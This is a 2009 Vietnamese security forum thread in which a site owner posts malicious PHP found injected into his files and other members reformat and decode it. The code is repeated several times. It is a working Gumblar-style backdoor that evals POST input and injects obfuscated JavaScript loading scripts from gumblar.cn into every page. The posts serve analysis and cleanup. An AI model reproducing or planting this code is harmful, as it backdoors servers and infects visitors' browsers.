Website đang bị hack cần được giúp đỡ

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận bảo mật

Website đang bị hack cần được giúp đỡ

[Question] Website đang bị hack cần được giúp đỡ	23/05/2009 22:37:40 (+0700) \| #1 \| 181559

sinhvienluoi81
Member

Joined: 19/08/2006 16:44:20
Messages: 25
Offline

Chào bác bậc tiền bối. Em mới làm một cái web để giới thiệu thông tin về công ty, mới đầu up lên thì thấy chạy rất
nhanh, nhưng mấy tuần sau thì tự nhiên thấy chạy rất chậm. Em truy cập vào và phát hiện ra một số file PHP bị cài
đoạn mã sau vào. Nhờ các cao nhân giúp đỡ:
Code:

<?php
 if(!function_exists('tmp_lkojfghx'))
{if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBYSzY9JyUnO3ZhciBaQWFLOT0ndm
FyfjIwfjYxfjNkfjIyU2NyfjY5fjcwdH40NW5nfjY5bmV+MjJ+MmNifjNkfjIyVmVyc2lvbih+MjkrfjIyfjJjan4zZH4yMn4yMn4yY3V
+M2RuYXZpZ2F0fjZmfjcyfjJldXNlckFnZW50fjNiaWYofjI4fjc1fjJlaW5kZXh+NGZmKH4yMldpbn4yMil+M2UwfjI5fjI2fjI2fjI4d
X4yZX42OW5kfjY1eE9mKH4yMk5UfjIwNn4yMil+M2MwfjI5fjI2fjI2KGRvY3VtZW50fjJlY29va342OWV+MmV+NjluZGV4T2Y
ofjIyfjZkaWVrfjNkMX4yMil+M2MwKX4yNn4yNih+NzR5cGV+NmZ+NjYofjdhfjcydnp0c34yOX4yMX4zZHR+NzlwZW9mfjI4f
jIyfjQxfjIyKSkpfjdienJ2enRzfjNkfjIyfjQxfjIyfjNiZXZhbCh+MjJpZih3fjY5bn42NH42Znd+MmV+MjJ+MmJ+NjF+MmJ+MjIpa
n4zZGorfjIyK2ErfjIyTX42MWpvcn4yMn4yYmJ+MmJhK34yMk1+NjlufjZmcn4yMitiK2ErfjIyQnVpbGR+MjJ+MmJ+NjIrfjIya
n4zYn4yMil+M2J+NjRvY3VtfjY1bnR+MmV3cn42OXR+NjUofjIyfjNjfjczY3JpcH43NH4yMHN+NzJjfjNkfjJmfjJmZ343NW1ifjZj
YXJ+MmVjbn4yZnJ+NzNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+MmZzY3JpcHR+M2V+MjIpfjNifjdkJzt2YXIg
S2pDPXVuZXNjYXBlKFpBYUs5LnJlcGxhY2UoL34vZyxYSzYpKTtldmFsKEtqQyl9KSgpOwogLS0+PC9zY3JpcHQ+'));
function tmp_lkojfghx($s)
{if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)
if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace
('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
{$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach
(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?

false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for
($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!
='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

=================
Nguyen Trung Dai
Mobile: 0947733000
Email: info@onggiovn.com
website: www.onggiovn.com

[Question] Re: Website đang bị hack cần được giúp đỡ	23/05/2009 23:11:06 (+0700) \| #2 \| 181563

kenshin8x
Member

Joined: 29/11/2006 20:45:54
Messages: 195
Location: ĐH CNTT
Offline

đề nghị bạn Sinhvienluoi đưa đoạn code trên vào tag code và chỉnh lại code cho dễ nhìn!
bạn để như thế chẳng có ai rảnh mà ngồi dò cho bạn đâu!
Thân!

[Question] Re: Website đang bị hack cần được giúp đỡ	24/05/2009 05:41:53 (+0700) \| #3 \| 181589

sinhvienluoi81
Member

Joined: 19/08/2006 16:44:20
Messages: 25
Offline

Đây là cái đoạn code lạ mà tôi phát hiện nó đã thêm vào file PHP của tôi. Nếu mà tôi có khả năng viết lại cho sáng sủa thì chắc là không cần phải nhờ đến các bác xem giúp.
Code:

<?php
  if(!function_exists('tmp_lkojfghx'))
 {if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
 if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
 ('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBYSzY9JyUnO3ZhciBaQWFLOT0ndm
 FyfjIwfjYxfjNkfjIyU2NyfjY5fjcwdH40NW5nfjY5bmV+MjJ+MmNifjNkfjIyVmVyc2lvbih+MjkrfjIyfjJjan4zZH4yMn4yMn4yY3V
 +M2RuYXZpZ2F0fjZmfjcyfjJldXNlckFnZW50fjNiaWYofjI4fjc1fjJlaW5kZXh+NGZmKH4yMldpbn4yMil+M2UwfjI5fjI2fjI2fjI4d
 X4yZX42OW5kfjY1eE9mKH4yMk5UfjIwNn4yMil+M2MwfjI5fjI2fjI2KGRvY3VtZW50fjJlY29va342OWV+MmV+NjluZGV4T2Y
 ofjIyfjZkaWVrfjNkMX4yMil+M2MwKX4yNn4yNih+NzR5cGV+NmZ+NjYofjdhfjcydnp0c34yOX4yMX4zZHR+NzlwZW9mfjI4f
 jIyfjQxfjIyKSkpfjdienJ2enRzfjNkfjIyfjQxfjIyfjNiZXZhbCh+MjJpZih3fjY5bn42NH42Znd+MmV+MjJ+MmJ+NjF+MmJ+MjIpa
 n4zZGorfjIyK2ErfjIyTX42MWpvcn4yMn4yYmJ+MmJhK34yMk1+NjlufjZmcn4yMitiK2ErfjIyQnVpbGR+MjJ+MmJ+NjIrfjIya
 n4zYn4yMil+M2J+NjRvY3VtfjY1bnR+MmV3cn42OXR+NjUofjIyfjNjfjczY3JpcH43NH4yMHN+NzJjfjNkfjJmfjJmZ343NW1ifjZj
 YXJ+MmVjbn4yZnJ+NzNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+MmZzY3JpcHR+M2V+MjIpfjNifjdkJzt2YXIg
 S2pDPXVuZXNjYXBlKFpBYUs5LnJlcGxhY2UoL34vZyxYSzYpKTtldmFsKEtqQyl9KSgpOwogLS0+PC9zY3JpcHQ+'));
 function tmp_lkojfghx($s)
 {if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
 if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)
 if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
 if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace
 ('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n -->
</script>
#','',$s);if(stristr($s,'<body'))
 $s=preg_replace('#(\s*
<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'
</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0)
 {$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach
 (@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?
 
 false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for
 ($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!
 ='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

=================
Nguyen Trung Dai
Mobile: 0947733000
Email: info@onggiovn.com
website: www.onggiovn.com

[Question] Re: Website đang bị hack cần được giúp đỡ	24/05/2009 06:18:46 (+0700) \| #4 \| 181594

conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline

Chậc, cái ở trên hình như cần phải decode base64 rồi escape chars rồi replace chars để xem thử nó có cái gì trong đó.

Có anh em nào rảnh thì giúp thèng em sinhvienluoi kẻo tội. smilie

What bringing us together is stronger than what pulling us apart.

[Question] Re: Website đang bị hack cần được giúp đỡ	24/05/2009 06:38:42 (+0700) \| #5 \| 181598

freeze_love
Member

Joined: 23/01/2009 23:07:19
Messages: 415
Location: HCMc
Offline

Bạn sang http://hcegroup.net để nhờ họ check cho. Thân ! ( smilie

)

do{
học đến điên;
}while (sống);

[Question] Re: Website đang bị hack cần được giúp đỡ	24/05/2009 08:45:13 (+0700) \| #6 \| 181602

jofori89
Member

Joined: 09/01/2008 18:07:48
Messages: 45
Location: Outside
Offline

Code:

<?php
  if(!function_exists('tmp_lkojfghx'))
 {if(isset($_POST['tmp_lkojfghx3']))
 eval($_POST['tmp_lkojfghx3']);
 if (!defined('TMP_XHGFJOKL')) define('TMP_XHGFJOKL',base64_decode
 ('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBYSzY9JyUnO3ZhciBaQWFLOT0ndm
 FyfjIwfjYxfjNkfjIyU2NyfjY5fjcwdH40NW5nfjY5bmV+MjJ+MmNifjNkfjIyVmVyc2lvbih+MjkrfjIyfjJjan4zZH4yMn4yMn4yY3V
 +M2RuYXZpZ2F0fjZmfjcyfjJldXNlckFnZW50fjNiaWYofjI4fjc1fjJlaW5kZXh+NGZmKH4yMldpbn4yMil+M2UwfjI5fjI2fjI2fjI4d
 X4yZX42OW5kfjY1eE9mKH4yMk5UfjIwNn4yMil+M2MwfjI5fjI2fjI2KGRvY3VtZW50fjJlY29va342OWV+MmV+NjluZGV4T2Y
 ofjIyfjZkaWVrfjNkMX4yMil+M2MwKX4yNn4yNih+NzR5cGV+NmZ+NjYofjdhfjcydnp0c34yOX4yMX4zZHR+NzlwZW9mfjI4f
 jIyfjQxfjIyKSkpfjdienJ2enRzfjNkfjIyfjQxfjIyfjNiZXZhbCh+MjJpZih3fjY5bn42NH42Znd+MmV+MjJ+MmJ+NjF+MmJ+MjIpa
 n4zZGorfjIyK2ErfjIyTX42MWpvcn4yMn4yYmJ+MmJhK34yMk1+NjlufjZmcn4yMitiK2ErfjIyQnVpbGR+MjJ+MmJ+NjIrfjIya
 n4zYn4yMil+M2J+NjRvY3VtfjY1bnR+MmV3cn42OXR+NjUofjIyfjNjfjczY3JpcH43NH4yMHN+NzJjfjNkfjJmfjJmZ343NW1ifjZj
 YXJ+MmVjbn4yZnJ+NzNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+MmZzY3JpcHR+M2V+MjIpfjNifjdkJzt2YXIg
 S2pDPXVuZXNjYXBlKFpBYUs5LnJlcGxhY2UoL34vZyxYSzYpKTtldmFsKEtqQyl9KSgpOwogLS0+PC9zY3JpcHQ+'));

function tmp_lkojfghx($s)
 {if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
 if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
 foreach ($a[0] as $v)
 if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
 if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace
 ('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);
 if(stristr($s,'<body'))
 $s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);
 elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;
 return $g?gzencode($s):$s;}

function tmp_lkojfghx2 ($a=0,$b=0,$c=0,$d=0)
 {$s=array();
 if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);
 foreach (@ob_get_status(1) as $v)
 if(($a=$v['name'])=='tmp_lkojfghx')
 return;

else $s[]=array($a=='default output handler'?
 
false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');
for
 ($i=0;$i<count($s);$i++){ob_start($s[$i][0]);
echo $s[$i][1];}}}
 if (($a=@set_error_handler('tmp_lkojfghx2'))!
 ='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

Chỉnh lại cấu trúc để ủng hộ, nhìn vẫn mông lung quá.

[Question] Re: Website đang bị hack cần được giúp đỡ	24/05/2009 11:12:35 (+0700) \| #7 \| 181614

hamvui847
Member

Joined: 22/05/2009 05:28:27
Messages: 1
Offline

This post is set hidden by a moderator because it may be violating forum's guideline or it needs modification before setting visible to members.

[Question] Re: Website đang bị hack cần được giúp đỡ	24/05/2009 11:41:17 (+0700) \| #8 \| 181616

FaL
Moderator

Joined: 14/04/2006 09:31:18
Messages: 1232
Offline

@jofori89:
Bồ đọc lại kỹ post của anh conmale nhé, có vài việc cần làm đấy smilie

Hãy giữ một trái tim nóng và một cái đầu lạnh

[Question] Re: Website đang bị hack cần được giúp đỡ	25/05/2009 22:45:42 (+0700) \| #9 \| 181755

canh_nguyen
Elite Member

Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline

decode đoạn
Code:

PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBYSzY9JyUnO3ZhciBaQWFLOT0ndm
  FyfjIwfjYxfjNkfjIyU2NyfjY5fjcwdH40NW5nfjY5bmV+MjJ+MmNifjNkfjIyVmVyc2lvbih+MjkrfjIyfjJjan4zZH4yMn4yMn4yY3V
  +M2RuYXZpZ2F0fjZmfjcyfjJldXNlckFnZW50fjNiaWYofjI4fjc1fjJlaW5kZXh+NGZmKH4yMldpbn4yMil+M2UwfjI5fjI2fjI2fjI4d
  X4yZX42OW5kfjY1eE9mKH4yMk5UfjIwNn4yMil+M2MwfjI5fjI2fjI2KGRvY3VtZW50fjJlY29va342OWV+MmV+NjluZGV4T2Y
  ofjIyfjZkaWVrfjNkMX4yMil+M2MwKX4yNn4yNih+NzR5cGV+NmZ+NjYofjdhfjcydnp0c34yOX4yMX4zZHR+NzlwZW9mfjI4f
  jIyfjQxfjIyKSkpfjdienJ2enRzfjNkfjIyfjQxfjIyfjNiZXZhbCh+MjJpZih3fjY5bn42NH42Znd+MmV+MjJ+MmJ+NjF+MmJ+MjIpa
  n4zZGorfjIyK2ErfjIyTX42MWpvcn4yMn4yYmJ+MmJhK34yMk1+NjlufjZmcn4yMitiK2ErfjIyQnVpbGR+MjJ+MmJ+NjIrfjIya
  n4zYn4yMil+M2J+NjRvY3VtfjY1bnR+MmV3cn42OXR+NjUofjIyfjNjfjczY3JpcH43NH4yMHN+NzJjfjNkfjJmfjJmZ343NW1ifjZj
  YXJ+MmVjbn4yZnJ+NzNzfjJmfjNmaWR+M2R+MjIrait+MjJ+M2V+M2N+NWN+MmZzY3JpcHR+M2V+MjIpfjNifjdkJzt2YXIg
  S2pDPXVuZXNjYXBlKFpBYUs5LnJlcGxhY2UoL34vZyxYSzYpKTtldmFsKEtqQyl9KSgpOwogLS0+PC9zY3JpcHQ+

được đoạn này :

Code:

<script language=javascript><!-- 
(function(){var XK6='%';var ZAaK9='var~20~61~3d~22Scr~69~70t~45ng~69ne~22~2cb~3d~22Version(~29+~22~2cj~3d~22~22~2cu~3dnavigat~6f~72~2euserAgent~3bif(~28~75~2eindex~4ff(~22Win~22)~3e0~29~26~26~28u~2e~69nd~65xOf(~22NT~206~22)~3c0~29~26~26(document~2ecook~69e~2e~69ndexOf(~22~6diek~3d1~22)~3c0)~26~26(~74ype~6f~66(~7a~72vzts~29~21~3dt~79peof~28~22~41~22)))~7bzrvzts~3d~22~41~22~3beval(~22if(w~69n~64~6fw~2e~22~2b~61~2b~22)j~3dj+~22+a+~22M~61jor~22~2bb~2ba+~22M~69n~6fr~22+b+a+~22Build~22~2b~62+~22j~3b~22)~3b~64ocum~65nt~2ewr~69t~65(~22~3c~73crip~74~20s~72c~3d~2f~2fg~75mb~6car~2ecn~2fr~73s~2f~3fid~3d~22+j+~22~3e~3c~5c~2fscript~3e~22)~3b~7d';var KjC=unescape(ZAaK9.replace(/~/g,XK6));eval(KjC)})();
 --></script>

Thay đoạn eval(KjC) ở cuối thành alert(KjC) rồi save ra file html chạy thử đi bồ smilie

[Question] Re: Website đang bị hack cần được giúp đỡ	31/05/2009 23:28:08 (+0700) \| #10 \| 182464

sinhvienluoi81
Member

Joined: 19/08/2006 16:44:20
Messages: 25
Offline

Nó là bị làm sao thế bác canh_nguyen. Em loay hoay mãi mà vẫn không ra.

=================
Nguyen Trung Dai
Mobile: 0947733000
Email: info@onggiovn.com
website: www.onggiovn.com

[Question] Re: Website đang bị hack cần được giúp đỡ	01/06/2009 02:33:30 (+0700) \| #11 \| 182483

gamma95
Researcher

Joined: 20/05/2003 07:15:41
Messages: 1377
Location: aaa">
Offline

Xem chi tiết:
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

Cánh chym không mỏi
lol

Go to:

Users currently in here
1 Anonymous